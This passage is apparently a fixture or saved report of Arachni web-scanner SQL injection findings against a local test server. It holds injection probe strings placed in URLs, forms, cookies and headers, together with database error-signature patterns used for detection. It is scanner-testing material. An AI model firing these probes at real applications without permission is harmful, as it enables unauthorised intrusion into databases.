        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "884"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: System.Data.OleDb.OleDbException
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
      :match: System.Data.OleDb.OleDbException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/mssql/link/flip?input=default
      :verification: false
      :id: System.Data.OleDb.OleDbException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
    regexp_match: System.Data.OleDb.OleDbException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"System.Data.OleDb.OleDbException\\n[Microsoft][ODBC SQL Server Driver]\\n[SQLServer JDBC Driver]\\n[SqlException\\nSystem.Data.SqlClient.SqlException\\nUnclosed quotation mark after the character string\\n'80040e14'\\nmssql_query()\\nMicrosoft OLE DB Provider for ODBC Drivers\\nMicrosoft OLE DB Provider for SQL Server\\nIncorrect syntax near\\nSintaxis incorrecta cerca de\\nSyntax error in string in query expression\\nProcedure or function 'ColumnSeek' expects parameter\\nUnclosed quotation mark before the character string\\nSyntax Error (missing operator) in query expression\\nData type mismatch in criteria expression\\nADODB.Field (0x800A0BCD)\\n[Microsoft][ODBC Microsoft Access Driver]\\nthe used select statements have different number of columns\\nOLE DB stuff SQL Server\\nWarningstuff mssql_\\nAccess stuff Driver\\nDriver stuff Access\\nJET Database Engine\\nAccess Database Engine\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mssql/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mssql/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "849"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: System.Data.OleDb.OleDbException
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
      :match: System.Data.OleDb.OleDbException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/mssql/link/append?input=default
      :verification: false
      :id: System.Data.OleDb.OleDbException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
    regexp_match: System.Data.OleDb.OleDbException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      System.Data.OleDb.OleDbException
      [Microsoft][ODBC SQL Server Driver]
      [SQLServer JDBC Driver]
      [SqlException
      System.Data.SqlClient.SqlException
      Unclosed quotation mark after the character string
      '80040e14'
      mssql_query()
      Microsoft OLE DB Provider for ODBC Drivers
      Microsoft OLE DB Provider for SQL Server
      Incorrect syntax near
      Sintaxis incorrecta cerca de
      Syntax error in string in query expression
      Procedure or function 'ColumnSeek' expects parameter
      Unclosed quotation mark before the character string
      Syntax Error (missing operator) in query expression
      Data type mismatch in criteria expression
      ADODB.Field (0x800A0BCD)
      [Microsoft][ODBC Microsoft Access Driver]
      the used select statements have different number of columns
      OLE DB stuff SQL Server
      Warningstuff mssql_
      Access stuff Driver
      Driver stuff Access
      JET Database Engine
      Access Database Engine

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mssql/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mssql/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;'`--=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "884"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: System.Data.OleDb.OleDbException
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
      :match: System.Data.OleDb.OleDbException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/mssql/cookie/flip
      :verification: false
      :id: System.Data.OleDb.OleDbException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
    regexp_match: System.Data.OleDb.OleDbException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"System.Data.OleDb.OleDbException\\n[Microsoft][ODBC SQL Server Driver]\\n[SQLServer JDBC Driver]\\n[SqlException\\nSystem.Data.SqlClient.SqlException\\nUnclosed quotation mark after the character string\\n'80040e14'\\nmssql_query()\\nMicrosoft OLE DB Provider for ODBC Drivers\\nMicrosoft OLE DB Provider for SQL Server\\nIncorrect syntax near\\nSintaxis incorrecta cerca de\\nSyntax error in string in query expression\\nProcedure or function 'ColumnSeek' expects parameter\\nUnclosed quotation mark before the character string\\nSyntax Error (missing operator) in query expression\\nData type mismatch in criteria expression\\nADODB.Field (0x800A0BCD)\\n[Microsoft][ODBC Microsoft Access Driver]\\nthe used select statements have different number of columns\\nOLE DB stuff SQL Server\\nWarningstuff mssql_\\nAccess stuff Driver\\nDriver stuff Access\\nJET Database Engine\\nAccess Database Engine\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mssql/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mssql/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value)
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "849"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: System.Data.OleDb.OleDbException
    injected: cookie value)
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
      :match: System.Data.OleDb.OleDbException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: )
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value)
      :injected: cookie value)
      :combo: 
        cookie2: cookie value)
      :action: http://localhost:7842/mssql/cookie/append
      :verification: false
      :id: System.Data.OleDb.OleDbException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
    regexp_match: System.Data.OleDb.OleDbException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      System.Data.OleDb.OleDbException
      [Microsoft][ODBC SQL Server Driver]
      [SQLServer JDBC Driver]
      [SqlException
      System.Data.SqlClient.SqlException
      Unclosed quotation mark after the character string
      '80040e14'
      mssql_query()
      Microsoft OLE DB Provider for ODBC Drivers
      Microsoft OLE DB Provider for SQL Server
      Incorrect syntax near
      Sintaxis incorrecta cerca de
      Syntax error in string in query expression
      Procedure or function 'ColumnSeek' expects parameter
      Unclosed quotation mark before the character string
      Syntax Error (missing operator) in query expression
      Data type mismatch in criteria expression
      ADODB.Field (0x800A0BCD)
      [Microsoft][ODBC Microsoft Access Driver]
      the used select statements have different number of columns
      OLE DB stuff SQL Server
      Warningstuff mssql_
      Access stuff Driver
      Driver stuff Access
      JET Database Engine
      Access Database Engine

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mssql/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mssql/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "1034"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: System.Data.OleDb.OleDbException
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
      :match: System.Data.OleDb.OleDbException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/mssql/header/flip
      :verification: false
      :id: System.Data.OleDb.OleDbException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
    regexp_match: System.Data.OleDb.OleDbException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"System.Data.OleDb.OleDbException\\n[Microsoft][ODBC SQL Server Driver]\\n[SQLServer JDBC Driver]\\n[SqlException\\nSystem.Data.SqlClient.SqlException\\nUnclosed quotation mark after the character string\\n'80040e14'\\nmssql_query()\\nMicrosoft OLE DB Provider for ODBC Drivers\\nMicrosoft OLE DB Provider for SQL Server\\nIncorrect syntax near\\nSintaxis incorrecta cerca de\\nSyntax error in string in query expression\\nProcedure or function 'ColumnSeek' expects parameter\\nUnclosed quotation mark before the character string\\nSyntax Error (missing operator) in query expression\\nData type mismatch in criteria expression\\nADODB.Field (0x800A0BCD)\\n[Microsoft][ODBC Microsoft Access Driver]\\nthe used select statements have different number of columns\\nOLE DB stuff SQL Server\\nWarningstuff mssql_\\nAccess stuff Driver\\nDriver stuff Access\\nJET Database Engine\\nAccess Database Engine\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mssql/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/mssql/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "849"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: System.Data.OleDb.OleDbException
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
      :match: System.Data.OleDb.OleDbException
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/mssql/header/append
      :verification: false
      :id: System.Data.OleDb.OleDbException
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
    regexp_match: System.Data.OleDb.OleDbException
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      System.Data.OleDb.OleDbException
      [Microsoft][ODBC SQL Server Driver]
      [SQLServer JDBC Driver]
      [SqlException
      System.Data.SqlClient.SqlException
      Unclosed quotation mark after the character string
      '80040e14'
      mssql_query()
      Microsoft OLE DB Provider for ODBC Drivers
      Microsoft OLE DB Provider for SQL Server
      Incorrect syntax near
      Sintaxis incorrecta cerca de
      Syntax error in string in query expression
      Procedure or function 'ColumnSeek' expects parameter
      Unclosed quotation mark before the character string
      Syntax Error (missing operator) in query expression
      Data type mismatch in criteria expression
      ADODB.Field (0x800A0BCD)
      [Microsoft][ODBC Microsoft Access Driver]
      the used select statements have different number of columns
      OLE DB stuff SQL Server
      Warningstuff mssql_
      Access stuff Driver
      Driver stuff Access
      JET Database Engine
      Access Database Engine

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/mssql/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/emc/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "64"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[DM_QUERY_E_SYNTAX]"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
      :match: "[DM_QUERY_E_SYNTAX]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/emc/form/flip
      :verification: false
      :id: "[DM_QUERY_E_SYNTAX]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
    regexp_match: "[DM_QUERY_E_SYNTAX]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"[DM_QUERY_E_SYNTAX]\\nhas occurred in the vicinity of:\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/emc/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/emc/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "53"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[DM_QUERY_E_SYNTAX]"
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
      :match: "[DM_QUERY_E_SYNTAX]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/emc/form/append
      :verification: false
      :id: "[DM_QUERY_E_SYNTAX]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
    regexp_match: "[DM_QUERY_E_SYNTAX]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      [DM_QUERY_E_SYNTAX]
      has occurred in the vicinity of:

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/emc/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/emc/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "64"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[DM_QUERY_E_SYNTAX]"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
      :match: "[DM_QUERY_E_SYNTAX]"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/emc/link/flip?input=default
      :verification: false
      :id: "[DM_QUERY_E_SYNTAX]"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
